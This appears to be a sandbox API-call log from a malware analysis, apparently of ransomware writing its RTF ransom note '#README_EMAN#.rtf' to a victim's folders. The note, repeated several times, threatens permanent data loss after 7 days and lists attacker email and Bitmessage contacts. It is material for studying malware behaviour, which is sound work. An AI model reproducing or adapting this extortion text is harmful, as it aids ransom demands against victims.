ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.810] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f495e8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nEwJVUzEVMBMGA1UEChMMRGl\x93/", lpUsedDefaultChar=0x0) returned 8717 [0298.810] WriteFile (in: hFile=0x27c, lpBuffer=0x1f495e8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f495e8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0298.811] CloseHandle (hObject=0x27c) returned 1 [0298.811] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hy\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\hy\\#readme_eman#.rtf")) returned 0xffffffff [0298.811] GetLastError () returned 0x2 [0298.811] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hy\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\hy\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0298.813] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is 